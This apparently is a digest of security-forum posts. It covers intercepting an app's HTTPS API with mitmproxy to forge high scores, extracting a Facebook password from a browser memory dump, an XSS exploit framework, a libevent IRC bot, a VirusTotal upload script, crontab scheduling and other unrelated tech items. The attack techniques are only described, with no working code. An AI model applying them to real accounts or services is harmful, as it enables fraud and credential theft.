Reverse Engineering Secure HTTP APIs With An SSL Proxy

Description:

Abstract

The proliferation of mobile devices has led to increased emphasis on native applications, such as Objective-C applications written for iOS or Java applications written for Android. Nonetheless, these native client applications frequently use HTTP APIs to communicate with a backend server. In addition, browser-based applications are growing more complex, and are also more likely to make asynchronous calls to HTTP APIs. In this presentation, we walk through a common (but insecure) method of securing HTTP APIs with SSL. As we will demonstrate, properly configured SSL will protect a protocol from eavesdropping (man-in-the-middle attack) but will not protect that protocol from the end user himself. In particular, we demonstrate how an end user can use an SSL proxy to decrypt and reverse engineer the HTTP API.

We will show a hypothetical HTTP API over SSL that tracks high scores for games. Then we will demonstrate an attack on that HTTP API using mitmproxy, an open source SSL proxy, to show how an attacker can forge a high score, even though the protocol is tunneled over SSL. We will then demonstrate a modified HTTP API that is resistant to this type of attack. Finally, we will wrap up by discussing other applications of SSL proxies to web application security testing, such as analyzing HTTP APIs to see if any personal information, such as a user's address book, is being transmitted over the API. This is the same technique used by researcher Arun Thampi in February 2012 to determine that the Path application on iOS was secretly uploading users' contacts to its HTTP API.

*****

Speakers

Alejandro Caceres, Computer Network Operations Engineer, Lunarline Inc.
I am a computer network operations engineer focused on building software products and interested in breaking things, mostly. I've been told I have a "hacker" mindset by my co-workers (I like to think that they meant it in a good way) and that is entirely true. I work on a number of open source projects related to pen testing and particularly enjoy dealing with unique ways of automating exploitation of web applications.

Mark Haase, Sr. Security Software Engineer, Lunarline, Inc.
I've been writing software since I was 13, writing software as a job since junior year of college, and working professionally as a software engineer since I graduated, in financial services and then information security.
Dumping Memory Password Using Task Manager

Description: This video is about dumping the memory contents of a process using Task Manager. In this video I have extracted a Facebook account's password from a browser memory dump using WinHex.
3. [h=1]Event driven socket programming[/h]
Author: [h=3]nslay[/h]

I've been working on a fully featured IRC bot for a couple of months on and off, and I usually write my own IO multiplexer. This time, however, I gave libevent a try and decided to share my experiences.

libevent

Anyway, if you're not familiar with event-driven design and you're interested in socket programming, I strongly recommend you learn about event-driven programming first, since it tends to make socket programming easier and more flexible. Then employ something like libevent (or write your own) that allows you to hook IO events for sockets. You'll find that your code:

- Generalizes to multiple sockets with no effort (and no threads)
- Often implicitly supports timers with no effort (depending on the underlying polling mechanism you use)
- Generalizes to multiple protocols (since you can just hook protocol-dependent handlers per socket)
- Integrates seamlessly with OOP (rather than having one object with a blocking recv() loop, just implement an OnRead() method and support multiple objects simultaneously!)

Anyway, here's my IRC bot. It is fully featured, though since it's a replica of something written in ~1998, it doesn't have cool features like searching Wikipedia (for example).

http://sourceforge.n...rojects/ircbnx/

To see examples of event-driven design, look at IrcClient.cpp and BnxDriver.cpp. Specific snippets are included below.

Relevant snippets from IrcClient.cpp

Here's a nifty trick to dispatch C callbacks to C++ member functions (I learned this trick from here):

    // Turns a libevent C callback into a call of a member function on the
    // object passed as the callback's void* argument.
    template<void (IrcClient::*Method)(evutil_socket_t, short)>
    static void Dispatch(evutil_socket_t fd, short what, void *arg) {
        IrcClient *pObject = (IrcClient *)arg;
        (pObject->*Method)(fd, what);
    }

You can redirect C callbacks to your C++ member functions. In this case, I use it to dispatch C callbacks to the following basic IO/timer functions:

    // Libevent callbacks
    void OnWrite(evutil_socket_t fd, short what);
    void OnRead(evutil_socket_t fd, short what);
    void OnSendTimer(evutil_socket_t fd, short what);

You can use the basic Read/Write events to determine:

- When a socket has completed a connection (OnWrite() is called)
- Receiving data (OnRead() is called and recv() returns > 0)
- When the remote host has closed the connection (OnRead() is called and recv() returns 0)

Here's how you do it in an event-driven framework. Here is IrcClient::Connect(). First create the socket:

    bool IrcClient::Connect(const std::string &strServer, const std::string &strPort) {
        if (m_socket != INVALID_SOCKET)
            Disconnect();

        m_socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

        if (m_socket == INVALID_SOCKET) {
            Log("socket failed (%d): %s", errno, strerror(errno));
            return false;
        }

Next, set it to non-blocking. Non-blocking means that connect() and recv() will never put the process to sleep until the request has completed. It's easy to understand why you want this in the context of multiple connections. If you are handling 50 sockets and you do not enable non-blocking I/O, then mishandling just one of those sockets causes the process to hang (and the other 49 sockets will not receive service until a request has completed on that one socket).

    #ifdef _WIN32
        u_long opt = 1;
        if (ioctlsocket(m_socket, FIONBIO, &opt) != 0) {
            Log("ioctlsocket failed (%d)", WSAGetLastError());
            CloseSocket();
            return false;
        }
    #else // _WIN32
        int flags = fcntl(m_socket, F_GETFL);
        if (fcntl(m_socket, F_SETFL, flags | O_NONBLOCK) == -1) {
            Log("fcntl failed (%d): %s", errno, strerror(errno));
            CloseSocket();
            return false;
        }
    #endif // !_WIN32

In this code, I use getaddrinfo() to resolve hostnames. It is more flexible and hides the hackish way you normally resolve a hostname and set up a sockaddr.

        struct addrinfo hints, *pResults = NULL;

        memset(&hints, 0, sizeof(hints));

        // NOTE: AI_PASSIVE only has an effect when the node name is NULL (bind()
        // sockets); it is harmless here but not needed for connect().
        hints.ai_flags = AI_PASSIVE;
        hints.ai_family = AF_INET;
        hints.ai_socktype = SOCK_STREAM;
        hints.ai_protocol = IPPROTO_TCP;

        int e = getaddrinfo(strServer.c_str(), strPort.c_str(), &hints, &pResults);

        if (e != 0) {
            Log("getaddrinfo failed (%d): %s", e, gai_strerror(e));
            CloseSocket();
            return false;
        }

Now we connect the socket. It will most likely fail with EAGAIN or WSAEWOULDBLOCK depending on platform. These mean the connection is in progress and not yet completed, so you must not treat these as errors.

        // NOTE: Cast to socklen_t since Windows makes ai_addrlen size_t
        e = connect(m_socket, pResults->ai_addr, (socklen_t)pResults->ai_addrlen);

    #ifdef _WIN32
        int iLastError = WSAGetLastError();
        if (e != 0 && iLastError != WSAEWOULDBLOCK) {
            Log("connect() failed (%d)", iLastError);
            CloseSocket();
            freeaddrinfo(pResults);
            return false;
        }
    #else // _WIN32
        if (e != 0 && errno != EINPROGRESS) {
            Log("connect() failed (%d): %s", errno, strerror(errno));
            CloseSocket();
            freeaddrinfo(pResults);
            return false;
        }
    #endif // !_WIN32

        freeaddrinfo(pResults);

Now we create our event contexts and hook them. The write event is only meant to be triggered once, to determine connectivity, hence EV_PERSIST is missing. Our read event is intended to be used to receive data and is set to EV_PERSIST. The last created event is a timer for send queues. We only initially need to hook OnWrite(), since we need to determine when the connect() has actually completed. Once it completes, we can then hook OnRead() and OnSendTimer(). Notice the use of the templated Dispatch() function. Nifty, huh?

        // XXX: Handle errors? (event_new() returns NULL on failure)
        m_pWriteEvent = event_new(m_pEventBase, m_socket, EV_WRITE, &Dispatch<&IrcClient::OnWrite>, this);
        m_pReadEvent = event_new(m_pEventBase, m_socket, EV_READ | EV_PERSIST, &Dispatch<&IrcClient::OnRead>, this);
        m_pSendTimer = event_new(m_pEventBase, -1, EV_PERSIST, &Dispatch<&IrcClient::OnSendTimer>, this);

        event_add(m_pWriteEvent, NULL);

        m_strCurrentServer = strServer;
        m_strCurrentPort = strPort;

        return true;
    }

Now here's OnWrite(). First it hooks OnRead(), and then it sets up the send queue timer to run in 0.5 second increments. Because the write event was not created with EV_PERSIST, it will only trigger once.

    void IrcClient::OnWrite(evutil_socket_t fd, short what) {
        event_add(m_pReadEvent, NULL);

        // TODO: Tunable for send timer
        struct timeval tv;
        tv.tv_sec = 0;
        tv.tv_usec = 500000;

        event_add(m_pSendTimer, &tv);

        m_clSendCounter.SetTimeStep(0.5f);

        OnConnect();
    }

And finally, here's OnRead(), which constructs lines (since SOCK_STREAM sockets may produce fragmented data). If there are unexpected problems (such as the remote host closing the connection), then it dispatches said events.

    void IrcClient::OnRead(evutil_socket_t fd, short what) {
    #ifdef _WIN32
        int readSize = recv(m_socket, m_stagingBuffer + m_stagingBufferSize,
                            (int)(sizeof(m_stagingBuffer)-1-m_stagingBufferSize), 0);
    #else // _WIN32
        ssize_t readSize = recv(m_socket, m_stagingBuffer + m_stagingBufferSize,
                                sizeof(m_stagingBuffer)-1-m_stagingBufferSize, 0);
    #endif // !_WIN32

        // NOTE: if the staging buffer is already full (a line longer than the
        // buffer with no terminator yet), the length passed to recv() is 0 and
        // recv() returns 0, so an oversized line also lands in this branch and
        // is logged as a remote close.
        if (readSize == 0) {
            Log("Remote host closed the connection.");
            OnDisconnect();
            return;
        }
        else if (readSize < 0) {
    #ifdef _WIN32
            Log("recv() failed (%d)", WSAGetLastError()); // Winsock does not set errno
    #else // _WIN32
            Log("recv() failed (%d): %s", errno, strerror(errno));
    #endif // !_WIN32
            OnDisconnect();
            return;
        }

        time(&m_lastRecvTime);

        m_stagingBufferSize += readSize;
        m_stagingBuffer[m_stagingBufferSize] = '\0';

        char *p, *q;
        p = q = m_stagingBuffer;

        // We check the buffer size since Disconnect() can be called somewhere in ProcessLine()
        while (m_stagingBufferSize > 0 && (q = strpbrk(p, "\r\n")) != NULL) {
            *q = '\0';
            m_stagingBufferSize -= (q-p) + 1;

            if (q != p)
                ProcessLine(p);

            p = q + 1;
        }

        // Keep the unterminated remainder for the next OnRead()
        memmove(m_stagingBuffer, p, m_stagingBufferSize);
    }

Relevant snippets from BnxDriver.cpp

Lastly, you need to actually dispatch the events. libevent makes this very simple. Here's BnxDriver::Run(). Notice that it can seamlessly handle multiple BnxBot objects with just one thread.

    bool BnxDriver::Run() {
        if (!Load())
            return false;

        struct event_base *pEventBase;

        pEventBase = event_base_new();
        if (pEventBase == NULL)
            return false;

        for (size_t i = 0; i < m_vBots.size(); ++i) {
            m_vBots[i]->SetEventBase(pEventBase);
            m_vBots[i]->StartUp();
        }

        event_base_dispatch(pEventBase);

        event_base_free(pEventBase);

        return true;
    }

Conclusion

For socket programming, you should definitely seek an event-driven design for simplicity and scalability. Enjoy.

If you want to see the code, check the repository or download the source zip. It's too big to paste here.

http://sourceforge.n.../85/tree/trunk/
http://sourceforge.n...s/ircbnx/files/

Source: Event driven socket programming - rohitab.com - Forums
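The line-framing loop from OnRead() above, as an added stand-alone example (not the bot's code): a bounded staging buffer fed with fragmented TCP reads, using the same strpbrk()/memmove() loop, but with the full-buffer case reported as its own error instead of being mistaken for a remote close. The buffer size, the recorded last line and the sample traffic are constructed for the example.

```c
#include <stdio.h>
#include <string.h>

/* Capacity of the staging buffer (assumed here; the bot chooses its own). */
#define STAGING_SIZE 512

typedef struct {
    char   buf[STAGING_SIZE];   /* bytes waiting for a line terminator */
    size_t len;                 /* how many of them are valid */
    int    lines;               /* non-empty lines delivered so far */
    char   last[STAGING_SIZE];  /* copy of the most recently delivered line */
} line_reader;

static void lr_init(line_reader *r)
{
    memset(r, 0, sizeof *r);
}

/* Stand-in for the bot's ProcessLine(): record the line instead of parsing IRC. */
static void process_line(line_reader *r, const char *line)
{
    strcpy(r->last, line);   /* always fits: line came out of buf, same size */
    r->lines++;
}

/* Feed one recv() fragment.  Returns the number of lines delivered from it,
 * or -1 when the buffer is full with no terminator, i.e. a line longer than
 * STAGING_SIZE-1 bytes; treat that as a protocol error and disconnect.
 * As in the original, strpbrk() needs buf NUL-terminated, so a NUL byte in
 * the stream stops the scan early. */
static int lr_feed(line_reader *r, const char *data, size_t n)
{
    int delivered = 0;

    while (n > 0) {
        size_t room = STAGING_SIZE - 1 - r->len;   /* keep one byte for '\0' */
        if (room == 0)
            return -1;

        size_t take = n < room ? n : room;
        memcpy(r->buf + r->len, data, take);
        r->len += take;
        data   += take;
        n      -= take;
        r->buf[r->len] = '\0';

        /* Same loop shape as IrcClient::OnRead(): split out every complete line. */
        char *p = r->buf, *q;
        while (r->len > 0 && (q = strpbrk(p, "\r\n")) != NULL) {
            *q = '\0';
            r->len -= (size_t)(q - p) + 1;
            if (q != p) {             /* skip the empty line between '\r' and '\n' */
                process_line(r, p);
                delivered++;
            }
            p = q + 1;
        }
        /* Keep the unterminated remainder at the front for the next fragment. */
        memmove(r->buf, p, r->len);
        r->buf[r->len] = '\0';
    }
    return delivered;
}

/* Constructed traffic: one line split across two reads, then a second line. */
static void run_fragmented(line_reader *r)
{
    const char *a = "PING :ser";
    const char *b = "ver\r\nPRIVMSG #chan :hi\r\n";
    lr_init(r);
    lr_feed(r, a, strlen(a));
    lr_feed(r, b, strlen(b));
}

static int fragmented_line_count(void)
{
    line_reader r;
    run_fragmented(&r);
    return r.lines;
}

static int fragmented_last_line_ok(void)
{
    line_reader r;
    run_fragmented(&r);
    return strcmp(r.last, "PRIVMSG #chan :hi") == 0;
}

/* Constructed traffic: 600 bytes with no terminator, longer than the buffer. */
static int oversized_line_result(void)
{
    line_reader r;
    char big[600];
    memset(big, 'A', sizeof big);
    lr_init(&r);
    return lr_feed(&r, big, sizeof big);
}

int main(void)
{
    printf("fragmented input: %d lines, last line ok = %d\n",
           fragmented_line_count(), fragmented_last_line_ok());
    printf("oversized line: %d\n", oversized_line_result());
    return 0;
}
```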
4. [h=3]YAPS.py 0.3 released – Python script to upload samples to VirusTotal[/h]

Finished automation of a process to upload samples from multiple trackers. Hope you can add it to your systems and daily jobs. History, requirements and installation – see here. Link to get – YAPS.py (don't forget to remove _.txt).

What's added:

1. Added a check of whether the sample is already present in the VirusTotal database. If so, the data is just dumped to the log.
2. If the sample is not present, it is uploaded to VirusTotal.
3. All info about samples (whether the sample is new, SHA256 hash, detection ratio and URL to review) is dumped to vtlog.txt in the same directory.
4. Comments added, in case you need to comment on samples. Enabled by default on already-detected samples. Edit the comment variable if needed. Currently there is a problem commenting on a just-submitted file; this will be solved.
5. All this is within the ToS of VirusTotal, and thanks to them for a good tool.

Hope it's useful not only to me. Stay safe, D.L.

    #!/usr/bin/env python3
    #
    # Script to upload samples to VT via API
    # ver 0.3
    #
    # Require:
    #  * Requests python library - grab here http://docs.python-requests.org/en/latest/
    # Usage:
    #  python yaps.py path/to/malware.exe
    # Wildcard:
    #  python yaps.py path/to/* or path/to/*.exe etc
    #
    # Variables:
    #  api_key - take Your API from Virustotal
    #  comment2add - comment that added to sample, in case You upload bunch of simular samples
    #
    # By Denis Laskov @it4sec http://ondailybasis.com
    #
    # Special thx:
    #  @joelverhagen for hashing function sample

    import glob
    import hashlib
    import sys
    import time

    import requests

    api_key = ''                # public API key from VT
    comment2add = '#Malware '   # comment attached to samples VT already knows

    if api_key == '':
        sys.exit('API Key is empty. Go to www.virustotal.com and paste one into the api_key variable')

    headers = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; uploaded by YAPS.py @it4sec)'}
    url = 'https://www.virustotal.com/vtapi/v2/file/scan'       # URL to submit files
    url2 = 'https://www.virustotal.com/vtapi/v2/file/report'    # URL to review reports
    url3 = 'https://www.virustotal.com/vtapi/v2/comments/put'   # URL to submit comments


    def sha256sum_f(file_path):
        # SHA256 function; reads in 8 KiB chunks so large samples need not fit in memory
        m = hashlib.sha256()
        with open(file_path, 'rb') as fh:
            while True:
                data = fh.read(8192)
                if not data:
                    break
                m.update(data)
        return m.hexdigest()


    def upload_f(file_path):
        # Upload sample func; returns the parsed JSON response
        with open(file_path, 'rb') as fh:
            r = requests.post(url, data={'apikey': api_key}, files={'file': fh}, headers=headers)
        return r.json()


    def VTcheck_f(hash_value, file_path):
        # check VT status of sample by its hash (no upload needed)
        print('Checking:', file_path, ' sha256:', hash_value)
        r = requests.post(url2, data={'resource': hash_value, 'apikey': api_key}, headers=headers)
        return r.json()


    def timer_f():
        # timer of 15 seconds to stay within the public API rate limit (VT ToS)
        print('Waiting 15 seconds to comply with VT ToS')
        time.sleep(15)


    def Report_f(already_known, file_path, json):
        # Func to append one sample's result to vtlog.txt in the current dir
        with open('./vtlog.txt', 'a') as n:
            n.write('\n\nAlready reported: ' + already_known)
            n.write('\nFilename: ' + file_path)
            n.write('\nsha256: ' + str(json.get('sha256')))
            try:
                n.write('\nDetection Ratio: ' + str(json['positives']) + '/' + str(json['total']))
            except KeyError:
                # a freshly queued sample has no detection results yet
                n.write('\nDetection Ratio: Unknown')
            n.write('\nURL: ' + str(json.get('permalink')))


    def Comment_f(hash_value):
        # Attach comment2add to a sample VT already knows
        requests.post(url3, data={'resource': hash_value, 'apikey': api_key, 'comment': comment2add},
                      headers=headers)


    # Expand wildcards ourselves so the "Wildcard" usage also works on shells that do not glob
    for pattern in sys.argv[1:]:
        for path in (glob.glob(pattern) or [pattern]):
            sha = sha256sum_f(path)
            response = VTcheck_f(sha, path)
            if response['response_code'] == 0:
                print('New sample:', path, ' uploading')
                timer_f()
                newstatus = upload_f(path)
                Report_f('No', path, newstatus)
                # Comment_f(sha)   # commenting a just-submitted file does not work yet
            else:
                print('Sample', path, ' already known or in process')
                Report_f('Yes', path, response)
                Comment_f(sha)
                timer_f()

Source: Day by day… | YAPS.py 0.3 released – Python script to upload samples to VirusTotal
5. [h=2]How to: Use crontab to schedule tasks[/h]
Sunday, January 06, 2013

If you want to run a command or script periodically, crontab is a very useful tool. To add a command or a script to the crontab schedule, the command you need to use is:

    sudo crontab -e

On my Arch Linux box, the default text editor is "vi", but on Linux Mint, the first time you run this command you will be asked to choose a text editor. Similarly, the crontab file on Arch Linux is completely blank, while the one on Linux Mint has many useful comment lines to help you understand how to use crontab. Here is how the crontab file looks on Linux Mint (the text editor is nano). The comment lines in that file explain quite well how to use crontab.

The format to schedule a task with crontab is:

    * * * * * /any/command/or/script

As you can see, there are 5 stars (with a space between each pair), and each star represents one part of the date format, in the following order:

- minute (0 -> 59)
- hour (0 -> 23)
- day of month (1 -> 31)
- month (1 -> 12)
- day of week (0 -> 6, with 0 = Sunday)

In short, to set a certain period to run a script, you just need to replace each star with a specific value.

Note: If you don't need to set any value for a star, just leave the star in the command. A star means "every", so a command with all 5 stars will run a task every minute until you delete this command from the crontab schedule.

For example, to run a script at 7:00 AM every Monday in the first three months of the year, the command will be:

    0 7 * 1-3 1 /path/to/the/script

As you can see, crontab is quite flexible with its format. You can use 1-5 in the day-of-week value to schedule a task to run on work days. Or, to run something on Monday, Tuesday and Thursday only, you can use 1,2,4 for the day-of-week value. For example, to run a script every 20 minutes on Monday, Tuesday and Thursday in January, February, May and October, the command will be:

    0,20,40 * * 1,2,5,10 1,2,4 /path/to/the/script

Crontab also has some special keywords for you to use:

- @reboot: at startup
- @yearly: once a year
- @annually: same as @yearly
- @monthly: once a month
- @weekly: once a week
- @daily: once a day
- @midnight: same as @daily
- @hourly: once an hour

If you use the keywords, you don't need to use the stars. For example, to run a script once every day, the command will be:

    @daily /path/to/the/script

After you insert the right command into the crontab file, just save the file and everything is scheduled. To check the tasks you have scheduled with crontab, the command to use is:

    sudo crontab -l

Source: How to: Use crontab to schedule tasks ~ Linux and Life
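An added example (not from the original post) that turns the five-field rules above into a checker: it parses star, range and list fields plus the @keywords into a yes/no answer for a given minute, hour, day, month and weekday, so a schedule can be verified before it goes into the crontab. Worth remembering when doing so: sudo crontab -e edits root's table, so whatever is scheduled there runs as root; the cron quirk that day-of-month and day-of-week are OR-ed when both are restricted is modelled as well. The instants in main() are constructed.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Parse one field ("*", "7", "1-3", "0,20,40", "1,2,4") into a bitmask over [lo, hi].
   Returns 0 on success, -1 if malformed or out of range; the /n step form is not
   covered by the post and is rejected here. */
static int parse_field(const char *field, int lo, int hi, uint64_t *mask)
{
    *mask = 0;
    if (strcmp(field, "*") == 0) {
        for (int v = lo; v <= hi; v++)
            *mask |= (uint64_t)1 << v;
        return 0;
    }
    const char *p = field;
    while (*p) {
        char *end;
        long a = strtol(p, &end, 10), b;
        if (end == p)
            return -1;                       /* not a number */
        b = a;
        if (*end == '-') {                   /* range a-b */
            const char *q = end + 1;
            b = strtol(q, &end, 10);
            if (end == q)
                return -1;
        }
        if (a < lo || b > hi || a > b)
            return -1;                       /* e.g. minute 60, hour 25 */
        for (long v = a; v <= b; v++)
            *mask |= (uint64_t)1 << v;
        if (*end == ',' && end[1] != '\0')
            p = end + 1;                     /* next list item */
        else if (*end == '\0')
            p = end;
        else
            return -1;                       /* stray character or trailing comma */
    }
    return 0;
}

/* The @keywords from the post, expanded the way cron itself defines them.
   @reboot has no clock equivalent and is handled in check(). */
static const char *expand_keyword(const char *spec)
{
    static const char *const kw[][2] = {
        {"@yearly", "0 0 1 1 *"}, {"@annually", "0 0 1 1 *"}, {"@monthly", "0 0 1 * *"},
        {"@weekly", "0 0 * * 0"}, {"@daily", "0 0 * * *"},  {"@midnight", "0 0 * * *"},
        {"@hourly", "0 * * * *"},
    };
    for (size_t i = 0; i < sizeof kw / sizeof kw[0]; i++)
        if (strcmp(spec, kw[i][0]) == 0)
            return kw[i][1];
    return spec;
}

/* 1 if the schedule fires at the given instant, 0 if not, -1 if malformed.
   spec is the time part only (e.g. "0 7 * 1-3 1" or "@daily"); wday follows the
   post's convention 0..6 with 0 = Sunday. */
static int check(const char *spec, int minute, int hour, int mday, int month, int wday)
{
    static const int lo[5] = {0, 0, 1, 1, 0}, hi[5] = {59, 23, 31, 12, 6};
    const int val[5] = {minute, hour, mday, month, wday};
    char buf[256], *fields[5];
    uint64_t mask[5];
    int hit[5];

    spec = expand_keyword(spec);
    if (strcmp(spec, "@reboot") == 0)
        return 0;                            /* runs at boot, never on a clock tick */
    if (strlen(spec) >= sizeof buf)
        return -1;
    strcpy(buf, spec);

    char *tok = strtok(buf, " \t");
    for (int i = 0; i < 5; i++) {
        if (tok == NULL || val[i] < lo[i] || val[i] > hi[i])
            return -1;                       /* fewer than five fields, or bad instant */
        fields[i] = tok;
        if (parse_field(tok, lo[i], hi[i], &mask[i]) != 0)
            return -1;
        hit[i] = (int)((mask[i] >> val[i]) & 1);
        tok = strtok(NULL, " \t");           /* a sixth token (the command) is ignored */
    }

    /* cron quirk: when BOTH day-of-month and day-of-week are restricted, the job
       runs when either one matches; otherwise both must match. */
    int both = strcmp(fields[2], "*") != 0 && strcmp(fields[4], "*") != 0;
    int day_ok = both ? (hit[2] || hit[4]) : (hit[2] && hit[4]);
    return hit[0] && hit[1] && hit[3] && day_ok;
}

int main(void)
{
    /* Constructed instant: 07:00 on a Monday (wday 1) in February. */
    printf("0 7 * 1-3 1 -> %d\n", check("0 7 * 1-3 1", 0, 7, 14, 2, 1));
    printf("60 * * * *  -> %d (malformed)\n", check("60 * * * *", 0, 7, 14, 2, 1));
    return 0;
}
```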
6. 16 of the Best Free Perl Books

Individuals wanting to learn and develop their understanding of the Perl programming language have a huge selection of books to choose from. There are hundreds of enlightening Perl books that are available to purchase at reasonable cost. However, given that Perl is an open source programming language, with an eclectic heritage written by Larry Wall and a cast of thousands, it is satisfying to see that some authors have made their Perl publications available to download without charge, and released under a freely distributable license.

Perl is a high-level, general-purpose, interpreted, scripting, dynamic programming language released under the GPL or Artistic license. It is available for most operating systems. Perl is implemented as an interpreted (not compiled) language. It is procedural, with variables, expressions, assignment statements, control structures, blocks and subroutines. Whilst Perl is not an acronym, it is sometimes known as Practical Extraction and Report Language and lightheartedly as the Pathologically Eclectic Rubbish Lister.

Perl can be used for a large number of tasks. It is often used to write CGI scripts. It is also frequently used for text manipulation, general web programming, networking, system administration, prototyping, database access, and graphical programming. One of the most powerful features of Perl is its extensive library of modules. Many of these modules are available from the Comprehensive Perl Archive Network, which mirrors over 100,000 Perl modules.

The focus of this article is to select some of the finest Perl books which are available to download for free. The majority of the books featured here can also be freely distributed. So get reading, learning and sharing.

1. Modern Perl

Website: www.onyxneon.com/books/modern_perl/index.html
Author: chromatic
Format: PDF, A4 PDF, HTML, ePub
Pages: 204

Modern Perl is designed to help programmers of all levels of proficiency. The book is not only a Perl tutorial. It concentrates on Perl 5.12 and 5.14, to demonstrate the latest and most effective time-saving features. Modern Perl explains how and why the language works, so that the full power of Perl can be unleashed.

Modern Perl is one way to describe the way the world's most effective Perl 5 programmers work. They use language idioms. They take advantage of the CPAN. They show good taste and craft to write powerful, maintainable, scalable, concise, and effective code.

This book provides a wealth of information on:

- The Perl Philosophy
- Perl and its Community: focusing on CPAN, community and development sites
- The Perl Language: introducing names, variables, values, control flow, scalars, arrays, hashes, coercion, packages, references, and nested data structures
- Operators: a series of one or more symbols used as part of the syntax
- Functions: a discrete, encapsulated unit of behaviour
- Regular Expressions and Matching: the use of these expressions gives Perl its incredible text processing power
- Objects: discrete, unique entities with their own identities
- Style and Efficacy: explaining the importance of writing maintainable, idiomatic, and effective Perl
- Managing Real Problems: covering testing, handling warnings, files, modules, distributions, and more
- Perl Beyond Syntax
- What to Avoid

The electronic versions of this book are released under the Creative Commons Attribution-NonCommercial-NoDerivs 3.0 Unported License.

2. Beginning Perl

Website: www.perl.org/books/beginning-perl/
Author: Simon Cozens
Format: PDF, HTML
Pages: 672

Beginning Perl is a book which, as its name suggests, is written for individuals who are new to programming and want to learn Perl. It starts from the absolute basics of Perl, guiding the reader carefully up to complex operations such as using Perl as a CGI language.

The book covers the following topics:

- Installing Perl on Windows and UNIX
- Making use of online Perl resources like CPAN
- First principles in programming and the Perl syntax
- Working with simple values
- Lists and Hashes
- Loops and Decisions
- Regular Expressions
- Working with files and databases
- Writing web pages in Perl
- Subroutines
- Running and Debugging Perl
- Modules
- Using Perl as an object-oriented language
- Perl and Databases
- The World of Perl

The book is licensed under the Creative Commons Attribution-NoDerivs-NonCommercial License.

The rest of the books: http://www.linuxlinks.com/article/2013010507211097/16oftheBestFreePerlBooks-Part1.html
7. [h=1]WebOS Ports gets Open webOS up and running on the Google Nexus 7[/h]
by Derek Kessler
Mon, 31 Dec 2012 1:05 pm EST

As if the Samsung Galaxy Nexus Open webOS port wasn't enough, WebOS Ports has announced a new porting project: Open webOS on the Google Nexus 7. The seven-inch Android-powered tablet built by Asus was the premier launch device for Android 4.1 Jelly Bean, and thanks to the open source and open hardware nature of the device, it is the perfect fit for WebOS Ports's next porting adventure. Seeing how much we loved the small seven-inch TouchPad Go, it's no surprise that the equally small Nexus 7 tablet was on the radar of WebOS Ports. Though larger, the 1280x800 screen on the Nexus 7 is close enough in pixel dimensions to the 1280x720 screen on the Galaxy Nexus that a lot of the work put into the smartphone project could be easily translated to the Nexus 7.

How easy? This work was led by WebOS Ports's Simon "morphis" Busch over the course of about a week while he was on winter break from college. The port was accomplished with the Galaxy Nexus project in conjunction with LibHybris, created by Carsten Munk (an engineer at Jolla, though he also leads Merproject, which grew out of Sailfish ancestors Maemo and Meego), a library that allows for "bionic-based [Android] hardware adaptations in glibc systems", in essence making it easier to translate between the designed-for-Android hardware and Linux-based software like the Open webOS operating system. This means that with LibHybris the WebOS Ports team won't have to write drivers from scratch for different Android-based devices they might wish to attack. In addition to LibHybris, the Nexus 7 port leverages the work of those involved in Merproject, FreeSmartphone, and SHR Project. A video of the port in action is after the break, and as an early alpha we're rather impressed.

Open webOS on the Nexus 7 runs generally smoothly (there's some intermittent and infrequent lag, which isn't anything too surprising at this stage) and has improved considerably from our last look at Open webOS on the Galaxy Nexus. In addition there's now an Enyo 2-based Settings app that allows you to toy with things like the Wi-Fi and brightness settings, and the new OWO Memos app (also Enyo 2 based). The port also supports the classic webOS tablet keyboard, the made-for-the-Galaxy-Nexus virtual gesture area, and forward-swipe-driven screen rotation. Essentially, it's like webOS on the TouchPad Go, except on the slimmer, lighter, faster, newer Nexus 7, and more open source-y.

Oh, and did we mention that it runs untethered now? Yeah, it does that. Being able to use Open webOS on the device without being hooked up to your computer is a big deal, and we're really quite psyched to see that happen. You still have to boot from a desktop, but after that you can unplug the cable and get on with the webOSing.

The Nexus 7 Open webOS port is still in its early stages, but thanks to the work done on the Galaxy Nexus port it's come a long way in a relatively short time. We're looking forward to what's coming next.

Source: WebOS Ports gets Open webOS up and running on the Google Nexus 7 | webOS Nation
9. And if, for example, I use Autoruns? Or 20 other utilities?
Smartmeter

Description: SMARTMETER. A technological overview of the German roll-out

This talk will give an overview of the technology, the laws and the technical guidelines of the smart meter roll-out in Germany. Smart meters are an ongoing topic in many countries. Sometimes the roll-out is driven by companies, sometimes by laws. Implementation failures, security nightmares and privacy issues have been covered even by the lamestream media. The next big roll-out will happen in Germany. This talk will give an overview of the planned roll-out and of the laws and technical guidelines.

The "Energiewirtschaftsgesetz" (ENWG) was renewed in 2005 and amended in the following years to reflect aspects like smart grids and renewable energy sources. It also covers the energy directives. The important aspect is that it makes the roll-out a law. In charge of the roll-out is the "Bundesministerium für Wirtschaft und Technologie" (BMWi), which delegates the task of defining the technical details to the "Bundesamt für Sicherheit in der Informationstechnik" (BSI). The BSI is therefore in the process of developing a so-called protection profile (PP, in the Common Criteria sense) for smart meter gateways and for the security module used in a smart meter. The BSI also develops a technical guideline (TR 03109) which describes how the communication-related details of the whole smart meter infrastructure have to be implemented to provide security and interoperability.

This talk will present the different roles defined by the TR and the PP. The rights and duties of the different roles in the model will be presented. The cryptographic mechanisms that will be used to secure the communication will be shown. Further, the additional services that are planned to be supported and the use cases that are defined for the smart metering system will be explained.
At ClubHack 2012: Talk on OWASP Xenotix XSS Exploit Framework v2

Description: Xenotix XSS Exploit Framework is a penetration testing tool to detect and exploit XSS vulnerabilities in Web Applications. https://www.owasp.org/index.php/OWASP_Xenotix_XSS_Exploit_Framework
12. [h=1]How social networks like Facebook intend to make money[/h]

Reaching millions of consumers (potential customers)

There are many ways to reach a given audience in marketing. Among them is drawing up a questionnaire to gain a solid knowledge of your own clientele and of the media in which to advertise your product so as to sell it best. For example, if you sell a new tractor for an agricultural farm, you will advertise it in a magazine bought mainly by farmers. That way you cover a market segment that guarantees you the largest sales volume.

The Internet and cookies

If I own software that analyzes how frequently farmers make purchases in a given territory... for example, I can set cookies on a website that sells tractors online to record where the people visiting the site come from, who sells or buys these tractors, and so on. If you used my services, I could tell you which agricultural fair you should go to for the best chance of selling your tractors. That is because my cookies detected many potential customers in that area. How much would you be willing to pay for such a marketing service? The investment needed to find potential customers would shrink enormously, since you don't have to hire an army of salespeople to prospect the market for years and years.

